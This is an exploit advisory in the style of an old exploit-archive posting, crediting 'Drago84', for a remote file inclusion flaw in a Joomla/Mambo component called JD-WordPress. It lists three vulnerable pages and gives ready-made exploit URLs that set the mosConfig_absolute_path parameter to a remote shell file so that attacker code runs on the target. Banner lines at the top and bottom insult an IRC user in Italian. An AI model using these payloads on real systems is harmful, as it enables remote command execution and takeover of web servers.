################### Marhateo il + Lamer di mirc 
##########################################

JD-WordPress -Mambo Moodle Remote File Include
------------------------------------------------------------------------------------

Bug Found by: Drago84

greetz: Exclusive Security

source code : 
http://www.joomladeveloping.org/content/view/17/36/

This bug allows a remote atacker to execute commands via 
rfi
path: ?mosConfig_absolute_path=

page:
wp-comments-post.php
wp-feed.php
wp-trackback.php

xpl:
http://web/components/com_jd-wp/wp-comments-post.php?mosConfig_absolute_path=http://shell.txt
http://web/components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://shell.txt
http://web/components/com_jd-wp/wp-trackback.php?mosConfig_absolute_path=http://shell.txt


################### Marhateo il coglione di mirc 
##########################################